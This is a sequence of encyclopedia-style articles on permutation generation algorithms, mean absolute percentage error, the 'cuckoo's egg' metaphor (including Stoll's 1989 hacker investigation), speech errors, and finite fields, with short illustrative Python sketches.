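    return [pool.pop(d) for d in code]

p = [3, 7, 5, 9, 1, 6, 8, 2, 4]
code = lehmer_code(p)
assert from_lehmer(code, range(1, 10)) == p
# The sum of the Lehmer code is the number of inversions of p:
assert sum(code) == sum(pi > pj for i, pi in enumerate(p) for pj in p[i + 1:])
```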
Converting successive natural numbers to the factorial number system produces those sequences inlexicographic order(as is the case with any mixed radix number system), and further converting them to permutations preserves the lexicographic ordering, provided the Lehmer code interpretation is used (using inversion tables, one gets a different ordering, where one starts by comparing permutations by theplaceof their entries 1 rather than by the value of their first entries). The sum of the numbers in the factorial number system representation gives the number of inversions of the permutation, and the parity of that sum gives thesignatureof the permutation. Moreover, the positions of the zeroes in the inversion table give the values of left-to-right maxima of the permutation (in the example 6, 8, 9) while the positions of the zeroes in the Lehmer code are the positions of the right-to-left minima (in the example, positions 4, 8, 9 of the values 1, 2, 5); this allows computing the distribution of such extrema among all permutations. A permutation with Lehmer codedn,dn−1, ...,d2,d1has an ascentn−iif and only ifdi≥di+1.
In computing it may be required to generate permutations of a given sequence of values. The methods best adapted to do this depend on whether one wants some randomly chosen permutations, or all permutations, and in the latter case if a specific ordering is required. Another question is whether possible equality among entries in the given sequence is to be taken into account; if so, one should only generate distinct multiset permutations of the sequence.
An obvious way to generate permutations ofnis to generate values for theLehmer code(possibly using thefactorial number systemrepresentation of integers up ton!), and convert those into the corresponding permutations. However, the latter step, while straightforward, is hard to implement efficiently, because it requiresnoperations each of selection from a sequence and deletion from it, at an arbitrary position; of the obvious representations of the sequence as anarrayor alinked list, both require (for different reasons) aboutn2/4 operations to perform the conversion. Withnlikely to be rather small (especially if generation of all permutations is needed) that is not too much of a problem, but it turns out that both for random and for systematic generation there are simple alternatives that do considerably better. For this reason it does not seem useful, although certainly possible, to employ a special data structure that would allow performing the conversion from Lehmer code to permutation inO(nlogn)time.
For generatingrandom permutationsof a given sequence ofnvalues, it makes no difference whether one applies a randomly selected permutation ofnto the sequence, or chooses a random element from the set of distinct (multiset) permutations of the sequence. This is because, even though in case of repeated values there can be many distinct permutations ofnthat result in the same permuted sequence, the number of such permutations is the same for each possible result. Unlike for systematic generation, which becomes unfeasible for largendue to the growth of the numbern!, there is no reason to assume thatnwill be small for random generation.
The basic idea to generate a random permutation is to generate at random one of then! sequences of integersd1,d2,...,dnsatisfying0 ≤di<i(sinced1is always zero it may be omitted) and to convert it to a permutation through abijectivecorrespondence. For the latter correspondence one could interpret the (reverse) sequence as a Lehmer code, and this gives a generation method first published in 1938 byRonald FisherandFrank Yates.[53]While at the time computer implementation was not an issue, this method suffers from the difficulty sketched above to convert from Lehmer code to permutation efficiently. This can be remedied by using a different bijective correspondence: after usingdito select an element amongiremaining elements of the sequence (for decreasing values ofi), rather than removing the element and compacting the sequence by shifting down further elements one place, oneswapsthe element with the final remaining element. Thus the elements remaining for selection form a consecutive range at each point in time, even though they may not occur in the same order as they did in the original sequence. The mapping from sequence of integers to permutations is somewhat complicated, but it can be seen to produce each permutation in exactly one way, by an immediateinduction. When the selected element happens to be the final remaining element, the swap operation can be omitted. This does not occur sufficiently often to warrant testing for the condition, but the final element must be included among the candidates of the selection, to guarantee that all permutations can be generated.
The resulting algorithm for generating a random permutation ofa[0],a[1], ...,a[n− 1]can be described as follows inpseudocode:
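A Python sketch of this algorithm (a standard Fisher–Yates formulation; names are illustrative):

```python
import random

def shuffle_in_place(a):
    """Fisher-Yates: for i from n-1 down to 1, swap a[i] with a random a[d], 0 <= d <= i."""
    for i in range(len(a) - 1, 0, -1):
        d = random.randint(0, i)   # i itself must be among the candidates
        a[i], a[d] = a[d], a[i]    # a no-op swap when d == i

random.seed(0)
a = list(range(8))
shuffle_in_place(a)
assert sorted(a) == list(range(8))   # the result is a permutation of the original values
```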
This can be combined with the initialization of the arraya[i] =ias follows
Ifdi+1=i, the first assignment will copy an uninitialized value, but the second will overwrite it with the correct valuei.
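A sketch of the combined, "inside-out" variant in Python (illustrative names); note how the case d = i behaves exactly as described:

```python
import random

def random_permutation(n):
    """Build a[0..n-1] as a random permutation of 0..n-1, initializing on the fly."""
    a = [None] * n
    for i in range(n):
        d = random.randint(0, i)
        a[i] = a[d]   # when d == i this copies an uninitialized value...
        a[d] = i      # ...but it is immediately overwritten with i here
    return a

random.seed(1)
p = random_permutation(8)
assert sorted(p) == list(range(8))
```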
However, the Fisher–Yates shuffle is not the fastest algorithm for generating a permutation: it is essentially a sequential algorithm, whereas "divide and conquer" procedures can achieve the same result in parallel.[54]
There are many ways to systematically generate all permutations of a given sequence.[55]One classic, simple, and flexible algorithm is based upon finding the next permutation inlexicographic ordering, if it exists. It can handle repeated values, for which case it generates each distinct multiset permutation once. Even for ordinary permutations it is significantly more efficient than generating values for the Lehmer code in lexicographic order (possibly using thefactorial number system) and converting those to permutations. It begins by sorting the sequence in (weakly)increasingorder (which gives its lexicographically minimal permutation), and then repeats advancing to the next permutation as long as one is found. The method goes back toNarayana Panditain 14th century India, and has been rediscovered frequently.[56]
The following algorithm generates the next permutation lexicographically after a given permutation. It changes the given permutation in-place.
1. Find the largest index k such that a[k] < a[k + 1]. If no such index exists, the permutation is the last permutation.
2. Find the largest index l greater than k such that a[k] < a[l].
3. Swap the value of a[k] with that of a[l].
4. Reverse the sequence from a[k + 1] up to and including the final element.
For example, given the sequence [1, 2, 3, 4] (which is in increasing order), and given that the index iszero-based, the steps are as follows: the largest index k with a[k] < a[k + 1] is k = 2 (since a[2] = 3 < a[3] = 4); the largest index l > k with a[k] < a[l] is l = 3; swapping a[2] with a[3] gives [1, 2, 4, 3]; and the suffix after position k is a single element, so reversing it changes nothing.
Following this algorithm, the next lexicographic permutation will be [1, 3, 2, 4], and the 24th permutation will be [4, 3, 2, 1] at which pointa[k] <a[k+ 1] does not exist, indicating that this is the last permutation.
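A Python sketch of the algorithm (illustrative names; the four steps appear as comments), which also handles repeated values and therefore visits each distinct multiset permutation once:

```python
def next_permutation(a):
    """Advance list a to its lexicographic successor in place; return False at the last one."""
    # 1. Find the largest k with a[k] < a[k+1].
    k = len(a) - 2
    while k >= 0 and a[k] >= a[k + 1]:
        k -= 1
    if k < 0:
        return False                       # a is weakly decreasing: the last permutation
    # 2. Find the largest l > k with a[k] < a[l].
    l = len(a) - 1
    while a[k] >= a[l]:
        l -= 1
    # 3. Swap a[k] and a[l]; 4. reverse the suffix after position k.
    a[k], a[l] = a[l], a[k]
    a[k + 1:] = reversed(a[k + 1:])
    return True

a = [1, 2, 3, 4]
assert next_permutation(a) and a == [1, 2, 4, 3]
assert next_permutation(a) and a == [1, 3, 2, 4]
b = [4, 3, 2, 1]
assert not next_permutation(b)             # a[k] < a[k+1] does not exist
```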
This method uses about 3 comparisons and 1.5 swaps per permutation, amortized over the whole sequence, not counting the initial sort.[57]
An alternative to the above algorithm, theSteinhaus–Johnson–Trotter algorithm, generates an ordering on all the permutations of a given sequence with the property that any two consecutive permutations in its output differ by swapping two adjacent values. This ordering on the permutations was known to 17th-century English bell ringers, among whom it was known as "plain changes". One advantage of this method is that the small amount of change from one permutation to the next allows the method to be implemented in constant time per permutation. The same can also easily generate the subset of even permutations, again in constant time per permutation, by skipping every other output permutation.[56]
An alternative to Steinhaus–Johnson–Trotter isHeap's algorithm,[58]said byRobert Sedgewickin 1977 to be the fastest algorithm of generating permutations in applications.[55]
The following figure shows the output of all three aforementioned algorithms for generating all permutations of lengthn=4{\displaystyle n=4}, and of six additional algorithms described in the literature.
An explicit sequence of swaps (transpositions, 2-cycles(pq){\displaystyle (pq)}) is described here; each swap is applied (on the left) to the previous chain, providing a new permutation, such that all the permutations can be retrieved, each only once.[64]This counting/generating procedure has an additional structure (call it nested), as it is given in steps: after completely retrievingSk−1{\displaystyle S_{k-1}}, continue retrievingSk∖Sk−1{\displaystyle S_{k}\backslash S_{k-1}}by cosetsSk−1τi{\displaystyle S_{k-1}\tau _{i}}ofSk−1{\displaystyle S_{k-1}}inSk{\displaystyle S_{k}}, by appropriately choosing the coset representativesτi{\displaystyle \tau _{i}}to be described below. Since eachSm{\displaystyle S_{m}}is sequentially generated, there is alast elementλm∈Sm{\displaystyle \lambda _{m}\in S_{m}}. So, after generatingSk−1{\displaystyle S_{k-1}}by swaps, the next permutation inSk∖Sk−1{\displaystyle S_{k}\backslash S_{k-1}}has to beτ1=(p1k)λk−1{\displaystyle \tau _{1}=(p_{1}k)\lambda _{k-1}}for some1≤p1<k{\displaystyle 1\leq p_{1}<k}. Then all swaps that generatedSk−1{\displaystyle S_{k-1}}are repeated, generating the whole cosetSk−1τ1{\displaystyle S_{k-1}\tau _{1}}, reaching the last permutation in that cosetλk−1τ1{\displaystyle \lambda _{k-1}\tau _{1}}; the next swap has to move the permutation to the representative of another cosetτ2=(p2k)λk−1τ1{\displaystyle \tau _{2}=(p_{2}k)\lambda _{k-1}\tau _{1}}.
Continuing the same way, one gets coset representativesτj=(pjk)λk−1⋯λk−1(pik)λk−1⋯λk−1(p1k)λk−1{\displaystyle \tau _{j}=(p_{j}k)\lambda _{k-1}\cdots \lambda _{k-1}(p_{i}k)\lambda _{k-1}\cdots \lambda _{k-1}(p_{1}k)\lambda _{k-1}}for the cosets ofSk−1{\displaystyle S_{k-1}}inSk{\displaystyle S_{k}}; the ordered set(p1,…,pk−1){\displaystyle (p_{1},\ldots ,p_{k-1})}(0≤pi<k{\displaystyle 0\leq p_{i}<k}) is called the set of coset beginnings. Two of these representatives are in the same coset if and only ifτj(τi)−1=(pjk)λk−1(pj−1k)λk−1⋯λk−1(pi+1k)=ϰij∈Sk−1{\displaystyle \tau _{j}(\tau _{i})^{-1}=(p_{j}k)\lambda _{k-1}(p_{j-1}k)\lambda _{k-1}\cdots \lambda _{k-1}(p_{i+1}k)=\varkappa _{ij}\in S_{k-1}}, that is,ϰij(k)=k{\displaystyle \varkappa _{ij}(k)=k}. Concluding, permutationsτi∈Sk−Sk−1{\displaystyle \tau _{i}\in S_{k}-S_{k-1}}are all representatives of distinct cosets if and only if for anyk>j>i≥1{\displaystyle k>j>i\geq 1},(λk−1)j−ipi≠pj{\displaystyle (\lambda _{k-1})^{j-i}p_{i}\neq p_{j}}(no repeat condition). In particular, for all generated permutations to be distinct it is not necessary for thepi{\displaystyle p_{i}}values to be distinct. In the process, one gets thatλk=λk−1(pk−1k)λk−1(pk−2k)λk−1⋯λk−1(p1k)λk−1{\displaystyle \lambda _{k}=\lambda _{k-1}(p_{k-1}k)\lambda _{k-1}(p_{k-2}k)\lambda _{k-1}\cdots \lambda _{k-1}(p_{1}k)\lambda _{k-1}}and this provides the recursion procedure.
Examples: forλ2{\displaystyle \lambda _{2}}one hasλ2=(12){\displaystyle \lambda _{2}=(12)}; to buildλ3{\displaystyle \lambda _{3}}there are only two possibilities for the coset beginnings satisfying the no repeat condition; the choicep1=p2=1{\displaystyle p_{1}=p_{2}=1}leads toλ3=λ2(13)λ2(13)λ2=(13){\displaystyle \lambda _{3}=\lambda _{2}(13)\lambda _{2}(13)\lambda _{2}=(13)}. To continue generatingS4{\displaystyle S_{4}}one needs appropriate coset beginnings (satisfying the no repeat condition); a convenient choice isp1=1,p2=2,p3=3{\displaystyle p_{1}=1,p_{2}=2,p_{3}=3}, leading toλ4=(13)(1234)(13)=(1432){\displaystyle \lambda _{4}=(13)(1234)(13)=(1432)}. Then, to buildλ5{\displaystyle \lambda _{5}}a convenient choice for the coset beginnings (satisfying the no repeat condition) isp1=p2=p3=p4=1{\displaystyle p_{1}=p_{2}=p_{3}=p_{4}=1}, leading toλ5=(15){\displaystyle \lambda _{5}=(15)}.
From examples above one can inductively go to higherk{\displaystyle k}in a similar way, choosing coset beginnings ofSk{\displaystyle S_{k}}inSk+1{\displaystyle S_{k+1}}, as follows: fork{\displaystyle k}even choosing all coset beginnings equal to 1 and fork{\displaystyle k}odd choosing coset beginnings equal to(1,2,…,k){\displaystyle (1,2,\dots ,k)}. With such choices the "last" permutation isλk=(1k){\displaystyle \lambda _{k}=(1k)}fork{\displaystyle k}odd andλk=(1k−)(12⋯k)(1k−){\displaystyle \lambda _{k}=(1k_{-})(12\cdots k)(1k_{-})}fork{\displaystyle k}even (k−=k−1{\displaystyle k_{-}=k-1}). Using these explicit formulae one can easily compute the permutation at a given index in the counting/generation steps with minimal computation. For this, writing the index in factorial base is useful. For example, the permutation for index699=5(5!)+4(4!)+1(2!)+1(1!){\displaystyle 699=5(5!)+4(4!)+1(2!)+1(1!)}is:σ=λ2(13)λ2(15)λ4(15)λ4(15)λ4(15)λ4(56)λ5(46)λ5(36)λ5(26)λ5(16)λ5={\displaystyle \sigma =\lambda _{2}(13)\lambda _{2}(15)\lambda _{4}(15)\lambda _{4}(15)\lambda _{4}(15)\lambda _{4}(56)\lambda _{5}(46)\lambda _{5}(36)\lambda _{5}(26)\lambda _{5}(16)\lambda _{5}=}λ2(13)λ2((15)λ4)4(λ5)−1λ6=(23)(14325)−1(15)(15)(123456)(15)={\displaystyle \lambda _{2}(13)\lambda _{2}((15)\lambda _{4})^{4}(\lambda _{5})^{-1}\lambda _{6}=(23)(14325)^{-1}(15)(15)(123456)(15)=}(23)(15234)(123456)(15){\displaystyle (23)(15234)(123456)(15)}, yielding finally,σ=(1653)(24){\displaystyle \sigma =(1653)(24)}.
Because multiplying by a swap (transposition) takes little computing time and every newly generated permutation requires only one such multiplication, this generation procedure is quite efficient. Moreover, since there is a simple formula for the last permutation in eachSk{\displaystyle S_{k}}, one can jump directly to the permutation at a given index in fewer steps than expected, working in blocks of subgroups rather than swap by swap.
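The factorial-base indexing mentioned above has a widely used, simpler relative: the factorial number system (Lehmer code) correspondence between the integers 0, …, n!−1 and the permutations of n elements. The sketch below illustrates that standard correspondence, not the coset-beginning scheme itself; the function name is ours.

```python
def index_to_permutation(index, n):
    """Map an integer in 0..n!-1 to a permutation of range(n) by
    decoding its factorial-base digits (the Lehmer code)."""
    digits = []
    for radix in range(1, n + 1):   # least significant digit first
        digits.append(index % radix)
        index //= radix
    pool = list(range(n))
    # The most significant digit selects among n elements, and so on.
    return [pool.pop(d) for d in reversed(digits)]
```

Indices 0, …, n!−1 yield the n! distinct permutations; in particular index 0 gives the identity.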
Permutations are used in theinterleavercomponent oferror detection and correctionalgorithms, such asturbo codes; for example, the3GPP Long Term Evolutionmobile telecommunication standard uses these ideas (see 3GPP technical specification 36.212[65]).
Such applications raise the question of fast generation of permutations satisfying certain desirable properties. One of the methods is based onpermutation polynomials. Permutations also serve as a basis for optimal hashing in Unique Permutation Hashing.[66]
|
https://en.wikipedia.org/wiki/Cycle_notation
|
Themean absolute percentage error(MAPE), also known asmean absolute percentage deviation(MAPD), is a measure of prediction accuracy of a forecasting method instatistics. It usually expresses the accuracy as a ratio defined by the formula:
MAPE=1n∑t=1n|At−FtAt|{\displaystyle {\mbox{MAPE}}={\frac {1}{n}}\sum _{t=1}^{n}\left|{\frac {A_{t}-F_{t}}{A_{t}}}\right|}
whereAt{\displaystyle A_{t}}is the actual value andFt{\displaystyle F_{t}}is the forecast value. Their difference is divided by the actual valueAt{\displaystyle A_{t}}. The absolute value of this ratio is summed for every forecasted point in time and divided by the number of fitted pointsn{\displaystyle n}.
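As a minimal illustration, the formula above can be computed directly (the function name and the choice of returning a ratio rather than a percentage are ours):

```python
def mape(actual, forecast):
    """MAPE as a ratio (multiply by 100 for a percentage).
    Assumes no actual value A_t is zero."""
    return sum(abs((a - f) / a)
               for a, f in zip(actual, forecast)) / len(actual)
```

For actuals (100, 200) and forecasts (110, 180) this gives (0.10 + 0.10)/2 = 0.10, i.e. 10%.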
Mean absolute percentage error is commonly used as a loss function forregression problemsand in model evaluation, because of its very intuitive interpretation in terms of relative error.
Consider a standard regression setting in which the data are fully described by a random pairZ=(X,Y){\displaystyle Z=(X,Y)}with values inRd×R{\displaystyle \mathbb {R} ^{d}\times \mathbb {R} }, andni.i.d. copies(X1,Y1),...,(Xn,Yn){\displaystyle (X_{1},Y_{1}),...,(X_{n},Y_{n})}of(X,Y){\displaystyle (X,Y)}. Regression models aim at finding a good model for the pair, that is ameasurable functiongfromRd{\displaystyle \mathbb {R} ^{d}}toR{\displaystyle \mathbb {R} }such thatg(X){\displaystyle g(X)}is close toY.
In the classical regression setting, the closeness ofg(X){\displaystyle g(X)}toYis measured via theL2risk, also called themean squared error(MSE). In the MAPE regression context,[1]the closeness ofg(X){\displaystyle g(X)}toYis measured via the MAPE, and the aim of MAPE regressions is to find a modelgMAPE{\displaystyle g_{\text{MAPE}}}such that:
gMAPE(x)=argming∈GE[|g(X)−YY||X=x]{\displaystyle g_{\mathrm {MAPE} }(x)=\arg \min _{g\in {\mathcal {G}}}\mathbb {E} {\Biggl [}\left|{\frac {g(X)-Y}{Y}}\right||X=x{\Biggr ]}}
whereG{\displaystyle {\mathcal {G}}}is the class of models considered (e.g. linear models).
In practicegMAPE(x){\displaystyle g_{\text{MAPE}}(x)}can be estimated by theempirical risk minimizationstrategy, leading to
g^MAPE(x)=argming∈G∑i=1n|g(Xi)−YiYi|{\displaystyle {\widehat {g}}_{\text{MAPE}}(x)=\arg \min _{g\in {\mathcal {G}}}\sum _{i=1}^{n}\left|{\frac {g(X_{i})-Y_{i}}{Y_{i}}}\right|}
From a practical point of view, the use of the MAPE as a quality function for regression model is equivalent to doing weightedmean absolute error(MAE) regression, also known asquantile regression. This property is trivial since
g^MAPE(x)=argming∈G∑i=1nω(Yi)|g(Xi)−Yi|withω(Yi)=|1Yi|{\displaystyle {\widehat {g}}_{\text{MAPE}}(x)=\arg \min _{g\in {\mathcal {G}}}\sum _{i=1}^{n}\omega (Y_{i})\left|g(X_{i})-Y_{i}\right|{\mbox{ with }}\omega (Y_{i})=\left|{\frac {1}{Y_{i}}}\right|}
As a consequence, the use of the MAPE is very easy in practice, for example using existing libraries for quantile regression allowing weights.
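A small numeric sketch of this equivalence, using a constant predictor g(x) = c as the model class for simplicity: the empirical MAPE objective and the MAE objective weighted by 1/|y| agree term by term, so any minimizer of one minimizes the other. The function names and data are illustrative.

```python
def mape_risk(c, ys):
    # Empirical MAPE of the constant model g(x) = c on targets ys.
    return sum(abs((c - y) / y) for y in ys)

def weighted_mae_risk(c, ys):
    # MAE weighted by w(y) = 1/|y|, as in the identity above.
    return sum(abs(c - y) / abs(y) for y in ys)

ys = [1.0, 2.0, 4.0, 8.0]
# The objectives coincide for every candidate c, hence so do their minimizers.
assert all(abs(mape_risk(c, ys) - weighted_mae_risk(c, ys)) < 1e-12
           for c in (0.5, 1.0, 3.0, 10.0))
```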
The use of the MAPE as a loss function for regression analysis is feasible both on a practical point of view and on a theoretical one, since the existence of an optimal model and theconsistencyof the empirical risk minimization can be proved.[1]
WMAPE(sometimes spelledwMAPE) stands for weighted mean absolute percentage error.[2]It is a measure used to evaluate the performance of regression or forecasting models. It is a variant of MAPE in which the absolute percent errors are combined as a weighted arithmetic mean. Most commonly the absolute percent errors are weighted by the actuals (e.g. in case of sales forecasting, errors are weighted by sales volume).[3]Effectively, this overcomes the 'infinite error' issue.[4]Its formula is:[4]wMAPE=∑i=1n(wi⋅|Ai−Fi||Ai|)∑i=1nwi=∑i=1n(|Ai|⋅|Ai−Fi||Ai|)∑i=1n|Ai|{\displaystyle {\mbox{wMAPE}}={\frac {\displaystyle \sum _{i=1}^{n}\left(w_{i}\cdot {\tfrac {\left|A_{i}-F_{i}\right|}{|A_{i}|}}\right)}{\displaystyle \sum _{i=1}^{n}w_{i}}}={\frac {\displaystyle \sum _{i=1}^{n}\left(|A_{i}|\cdot {\tfrac {\left|A_{i}-F_{i}\right|}{|A_{i}|}}\right)}{\displaystyle \sum _{i=1}^{n}\left|A_{i}\right|}}}
Wherewi{\displaystyle w_{i}}is the weight,A{\displaystyle A}is a vector of the actual data andF{\displaystyle F}is the forecast or prediction.
However, this effectively simplifies to a much simpler formula:wMAPE=∑i=1n|Ai−Fi|∑i=1n|Ai|{\displaystyle {\mbox{wMAPE}}={\frac {\displaystyle \sum _{i=1}^{n}\left|A_{i}-F_{i}\right|}{\displaystyle \sum _{i=1}^{n}\left|A_{i}\right|}}}
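The simplification can be checked numerically; both function names below are illustrative labels for the two forms of the formula.

```python
def wmape_weighted(actual, forecast):
    # Definition above with weights w_i = |A_i|.
    num = sum(abs(a) * (abs(a - f) / abs(a)) for a, f in zip(actual, forecast))
    return num / sum(abs(a) for a in actual)

def wmape_simplified(actual, forecast):
    # Simplified form: total absolute error over total |actuals|.
    return (sum(abs(a - f) for a, f in zip(actual, forecast))
            / sum(abs(a) for a in actual))

A, F = [10.0, 20.0, 30.0], [12.0, 18.0, 33.0]
assert abs(wmape_weighted(A, F) - wmape_simplified(A, F)) < 1e-12
```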
Confusingly, sometimes when people refer to wMAPE they are talking about a different model in which the numerator and denominator of the wMAPE formula above are weighted again by another set of custom weightswi{\displaystyle w_{i}}. Perhaps it would be more accurate to call this the double weighted MAPE (wwMAPE). Its formula is:wwMAPE=∑i=1nwi|Ai−Fi|∑i=1nwi|Ai|{\displaystyle {\mbox{wwMAPE}}={\frac {\displaystyle \sum _{i=1}^{n}w_{i}\left|A_{i}-F_{i}\right|}{\displaystyle \sum _{i=1}^{n}w_{i}\left|A_{i}\right|}}}
Although the concept of MAPE sounds very simple and convincing, it has major drawbacks in practical application,[5]and there are many studies on shortcomings and misleading results from MAPE.[6][7]
To overcome these issues with MAPE, there are some other measures proposed in literature:
|
https://en.wikipedia.org/wiki/Mean_absolute_percentage_error
|
Acuckoo's eggis ametaphorforbrood parasitism, where a parasitic bird deposits its egg into a host's nest, which then incubates and feeds the chick that hatches, even at the expense of its own offspring. That original biological meaning has been extended to other uses, including one which referencesspywareand other pieces ofmalware.
The concept has been in use in the study ofbrood parasitismin birds since the 19th century. It first evolved ametaphoricmeaning of "misplaced trust",[1]wherein the chick hatched of acuckoo's egg, having been surreptitiously laid among the eggs of another bird of a different, smaller species, and thereupon incubated by the unwitting host parents, will consume any food brought by them to feed their own chicks, which then starve and eventually die.
The first well known application totradecraftwas in the 1989 bookThe Cuckoo's Egg: Tracking a Spy Through the Maze of Computer EspionagebyClifford Stoll,[2]in which Stoll deployed ahoneypotto catch a cyberhackerthat had accessed the secure computer system of the classified U.S. governmentLawrence Berkeley National Laboratory.[3]
Stoll chronicles the so-called 'Cuckoo's Egg Investigation', "a term coined by American press to describe (at the time) the farthest reaching computer-mediated espionage penetration by foreign agents”, which was also known as Operation Equalizer initiated and executed by theKGBthrough a small cadre of German hackers.[4]
In his book Stoll describes the hacker employing aTrojan horsestrategy to penetrate the secure Livermore Laboratory computer system:
I watched the cuckoo lay its egg: once again, he manipulated the files in my computer to make himself super-user. His same old trick: use the Gnu-Emacs move-mail to substitute his tainted program for the system's atrun file. Five minutes later, shazam! He was system manager.[5]
|
https://en.wikipedia.org/wiki/Cuckoo%27s_egg_(metaphor)
|
Aspeech error, commonly referred to as aslip of the tongue[1](Latin:lapsus linguae, or occasionally self-demonstratingly,lipsus languae) ormisspeaking, is adeviation(conscious or unconscious) from the apparently intended form of anutterance.[2]They can be subdivided into spontaneously and inadvertently producedspeecherrors and intentionally produced word-plays or puns. Another distinction can be drawn between production and comprehension errors. Errors in speech production and perception are also called performance errors.[3]Some examples of speech error include sound exchange or sound anticipation errors. In sound exchange errors, the order of two individual morphemes is reversed, while in sound anticipation errors a sound from a later syllable replaces one from an earlier syllable.[4]Slips of the tongue are a normal and common occurrence. One study shows that most people can make as many as 22 slips of the tongue per day.[5]
Speech errors are common amongchildren, who have yet to refine their speech, and can frequently continue into adulthood. When errors continue past the age of 9 they are referred to as "residual speech errors" or RSEs.[6]They sometimes lead to embarrassment and betrayal of the speaker'sregionalorethnicorigins. However, it is also common for them to enter thepopular cultureas a kind of linguistic "flavoring". Speech errors may be used intentionally for humorous effect, as withspoonerisms.
Within the field ofpsycholinguistics, speech errors fall under the category oflanguage production. Types of speech errors include: exchange errors, perseveration, anticipation, shift, substitution, blends, additions, and deletions. The study of speech errors has contributed to the establishment/refinement of models of speech production sinceVictoria Fromkin's pioneering work on this topic.[7]
Speech errors are made on an occasional basis by all speakers.[1]They occur more often when speakers are nervous, tired, anxious or intoxicated.[1]During live broadcasts on TV or on the radio, for example, nonprofessional speakers and even hosts often make speech errors because they are under stress.[1]Some speakers seem to be more prone to speech errors than others. For example, there is a certain connection between stuttering and speech errors.[8]Charles F. Hockett explains that "whenever a speaker feels some anxiety about possible lapse, he will be led to focus attention more than normally on what he has just said and on what he is just about to say. These are ideal breeding grounds for stuttering."[8]Another example of a "chronic sufferer" is ReverendWilliam Archibald Spooner, whose peculiar speech may be caused by a cerebral dysfunction, but there is much evidence that he invented his famous speech errors (spoonerisms).[1]
An explanation for the occurrence of speech errors comes frompsychoanalysis, in the so-calledFreudian slip. Sigmund Freud assumed that speech errors are the result of an intrapsychic conflict of concurrent intentions.[1]"Virtually all speech errors [are] caused by the intrusion of repressed ideas from the unconscious into one's conscious speech output", Freud explained.[1]In fact, his hypothesis explains only a minority of speech errors.[1]
There are few speech errors that clearly fall into only one category. The majority of speech errors can be interpreted in different ways and thus fall into more than one category.[9]For this reason, percentage figures for the different kinds of speech errors may be of limited accuracy.[10]Moreover, the study of speech errors gave rise to different terminologies and different ways of classifying speech errors. Here is a collection of the main types:
Speech errors can affect different kinds of segments or linguistic units:
Speech production is a highly complex and extremely rapid process, and thus research into the involved mental mechanisms proves to be difficult.[10]Investigating the audible output of the speech production system is a way to understand these mental mechanisms. According to Gary S. Dell "the inner workings of a highly complex system are often revealed by the way in which the system breaks down".[10]Therefore, speech errors are of an explanatory value with regard to the nature of language and language production.[12]
Performance errors may provide the linguist with empirical evidence for linguistic theories and serve to test hypotheses about language and speech production models.[13]For that reason, the study of speech errors is significant for the construction of performance models and gives insight into language mechanisms.[13]
An example of the information that can be obtained is the use of "um" or "uh" in a conversation.[15]These might be meaningful words that tell different things, one of which is to hold a place in the conversation so as not to be interrupted. There seems to be a hesitant stage and fluent stage that suggest speech has different levels of production. The pauses seem to occur between sentences, conjunctional points and before the first content word in a sentence. That suggests that a large part of speech production happens there.
Schachter et al. (1991) conducted an experiment to examine if the numbers of word choices affect pausing. They sat in on the lectures of 47 undergraduate professors from 10 different departments and calculated the number and times of filled pauses and unfilled pauses. They found significantly more pauses in the humanities departments as opposed to the natural sciences.[16]These findings suggest that the greater the number of word choices, the more frequent are the pauses, and hence the pauses serve to allow us time to choose our words.
Slips of the tongue are another form of "errors" that can help us understand the process of speech production better. Slips can occur at various levels: syntactic, phrasal, lexical-semantic, morphological, and phonological. They can take multiple forms, such as additions, substitutions, deletions, exchanges, anticipations, perseverations, shifts, and haplologies (M. F. Garrett, 1975).[17]Slips are orderly because language production is orderly.
There are some biases shown through slips of the tongue. One kind is a lexical bias which shows that the slips people generate are more often actual words than random sound strings. Baars Motley and Mackay (1975) found that it was more common for people to turn two actual words to two other actual words than when they do not create real words.[14]This suggests that lexemes might overlap somewhat or be stored similarly.
A second kind is a semantic bias which shows a tendency for sound bias to create words that are semantically related to other words in the linguistic environment. Motley and Baars (1976) found that a word pair like "get one" will more likely slip to "wet gun" if the pair before it is "damp rifle". These results suggest that we are sensitive to how things are laid out semantically.[18]
Since the 1980s, the wordmisspeakinghas been used increasingly in politics to imply that errors made by a speaker are accidental and should not be construed as a deliberate attempt to misrepresent the facts of a case. As such, its usage has attracted a degree of media coverage, particularly from critics who feel that the term is overlyapprobativein cases where either ignorance of the facts or intent to misrepresent should not be discarded as possibilities.[19][20]
The word was used by a White House spokesman afterGeorge W. Bushseemed to say that his government was always "thinking about new ways to harm our country and our people" (a classic example of aBushism), and more famously by then American presidential candidateHillary Clintonwho recalled landing at the US military outpost ofTuzla"under sniper fire" (in fact, video footage demonstrates that there were no such problems on her arrival).[20][21]Other users of the term include American politicianRichard Blumenthal, who incorrectly stated on a number of occasions that he had served in Vietnam during theVietnam War.[20]
|
https://en.wikipedia.org/wiki/Speech_error
|
Inmathematics, afinite fieldorGalois field(so-named in honor ofÉvariste Galois) is afieldthat contains a finite number ofelements. As with any field, a finite field is aseton which the operations of multiplication, addition, subtraction and division are defined and satisfy certain basic rules. The most common examples of finite fields are theintegers modp{\displaystyle p}whenp{\displaystyle p}is aprime number.
Theorderof a finite field is its number of elements, which is either a prime number or aprime power. For every prime numberp{\displaystyle p}and every positive integerk{\displaystyle k}there are fields of orderpk{\displaystyle p^{k}}. All finite fields of a given order areisomorphic.
Finite fields are fundamental in a number of areas of mathematics andcomputer science, includingnumber theory,algebraic geometry,Galois theory,finite geometry,cryptographyandcoding theory.
A finite field is a finite set that is afield; this means that multiplication, addition, subtraction and division (excluding division by zero) are defined and satisfy the rules of arithmetic known as thefield axioms.[1]
The number of elements of a finite field is called itsorderor, sometimes, itssize. A finite field of orderq{\displaystyle q}exists if and only ifq{\displaystyle q}is aprime powerpk{\displaystyle p^{k}}(wherep{\displaystyle p}is a prime number andk{\displaystyle k}is a positive integer). In a field of orderpk{\displaystyle p^{k}}, addingp{\displaystyle p}copies of any element always results in zero; that is, thecharacteristicof the field isp{\displaystyle p}.[1]
Forq=pk{\displaystyle q=p^{k}}, all fields of orderq{\displaystyle q}areisomorphic(see§ Existence and uniquenessbelow).[2]Moreover, a field cannot contain two different finitesubfieldswith the same order. One may therefore identify all finite fields with the same order, and they are unambiguously denotedFq{\displaystyle \mathbb {F} _{q}},Fq{\displaystyle \mathbf {F} _{q}}orGF(q){\displaystyle \mathrm {GF} (q)}, where the letters GF stand for "Galois field".[3]
In a finite field of orderq{\displaystyle q}, thepolynomialXq−X{\displaystyle X^{q}-X}has allq{\displaystyle q}elements of the finite field asroots.[citation needed]The non-zero elements of a finite field form amultiplicative group. This group iscyclic, so all non-zero elements can be expressed as powers of a single element called aprimitive elementof the field. (In general there will be several primitive elements for a given field.)[1]
